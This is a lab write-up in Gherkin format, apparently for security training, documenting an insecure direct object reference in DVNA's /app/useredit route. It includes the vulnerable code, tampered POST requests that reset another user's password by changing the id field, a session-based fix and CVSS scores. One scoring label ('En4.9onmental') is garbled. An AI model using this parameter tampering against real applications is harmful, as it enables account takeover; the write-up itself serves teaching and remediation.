## Version 1.4.2
## language: en

Feature:
  TOE:
    DVNA
  Category:
    Broken Access Control
  Location:
    /app/useredit - id (Parameter)
  CWE:
    CWE-0639: Authorization Bypass Through User-Controlled Key -base-
      https://cwe.mitre.org/data/definitions/639.html
    CWE-0862: Missing Authorization -class-
      https://cwe.mitre.org/data/definitions/862.html
    CWE-1011: Authorize Actors -category-
      https://cwe.mitre.org/data/definitions/1011.html
  CAPEC:
    CAPEC-162: Manipulating Hidden Fields -detailed-
      https://capec.mitre.org/data/definitions/162.html
    CAPEC-077: Manipulating User-Controlled Variables -standard-
      https://capec.mitre.org/data/definitions/77.html
    CAPEC-022: Exploiting Trust in Client -meta-
      https://capec.mitre.org/data/definitions/22.html
  Rule:
    REQ.096: https://fluidattacks.com/web/es/rules/096/
  Goal:
    Change another user's password
  Recommendation:
    Implement proper access control

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
  TOE information:
    Given I am running DVNA in a docker container at
    """
    http://localhost:8000/
    """

  Scenario: Normal use case
  Normal site navigation
    Given I go to http://localhost:8000/
    Then I can navigate the site

  Scenario: Static detection
  No access control
    Given I see the code at "dvna/routes/app.js"
    """
    ...
    144 module.exports.userEditSubmit = function (req, res) {
    145   db.User.find({
    146     where: {
    147       'id': req.body.id
    148     }
    149   }).then(user =>{
    150     if(req.body.password.length>0){
    151       if(req.body.password.length>0){
    152         if (req.body.password == req.body.cpassword) {
    153           user.password = bCrypt.hashSync(req.body.password, bCrypt.genS
    altSync(10), null)
    154         }else{
    ...
    """
    Then I see it modifies the user corresponding to the id param in the request

  Scenario: Dynamic detection
  Checking default routes
    Given I intercept a password change request with Burp
    """
    POST /app/useredit HTTP/1.1
    Host: localhost:8000
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/
    66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://localhost:8000/app/useredit
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 53
    Connection: close
    Cookie: cookieconsent_status=dismiss; continueCode=qo61W2w2ZW6a3BeyxzDmjrPKl
    Y5bAyD0LO4XpRqkJQ8VE7g1ovNMn9kZ9wrE; connect.sid=s%3AAlQ52qhr7LkuRmnbEIsmlrC
    35Ylac6Ki.OAJbwAc%2FOXNTEDGORoI6Y%2BshSSs7oGXVFmxc0pEcls8
    Upgrade-Insecure-Requests: 1
    Cache-Control: max-age=0

    id=1&name=simo&email=a%40b.com&password=f&cpassword=f
    """
    Then I notice it's sending an id parameter so I change it
    """
    POST /app/useredit HTTP/1.1
    Host: localhost:8000
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/
    66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://localhost:8000/app/useredit
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 53
    Connection: close
    Cookie: cookieconsent_status=dismiss; continueCode=qo61W2w2ZW6a3BeyxzDmjrPKl
    Y5bAyD0LO4XpRqkJQ8VE7g1ovNMn9kZ9wrE; connect.sid=s%3AAlQ52qhr7LkuRmnbEIsmlrC
    35Ylac6Ki.OAJbwAc%2FOXNTEDGORoI6Y%2BshSSs7oGXVFmxc0pEcls8
    Upgrade-Insecure-Requests: 1
    Cache-Control: max-age=0

    id=0&name=simo&email=a%40b.com&password=f&cpassword=f
    """
    And get a success response
    Then I create a new user and try changing the password with id 1
    Then I login to the first account with the new password I sent
    And it works, so I know the function is vulnerable to IDOR

  Scenario: Exploitation
  Getting admin access
    Given I can change whatever user's password
    Then I can target any specific user I want
    And gain access to their account

  Scenario: Remediation
  Access control
    Given I patch the code like this
    """
    ...
    144 module.exports.userEditSubmit = function (req, res) {
    145   db.User.find({
    146     where: {
    147       'id': req.user.id
    148     }
    149   }).then(user =>{
    150     if(req.body.password.length>0){
    151       if(req.body.password.length>0){
    152         if (req.body.password == req.body.cpassword) {
    153           user.password = bCrypt.hashSync(req.body.password, bCrypt.genS
    altSync(10), null)
    154         }else{
    ...
    """
    Then it uses the user id from the session rather than the request parameter
    And becase this value can't be controlled by the user, the vuln is fixed

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.3/10 (High) - AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.7/10 (High) - E:F/RL:O/RC:C/
  En4.9onmental: Unique and relevant attributes to a specific user environment
    7.7/10 (High) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2019-01-25
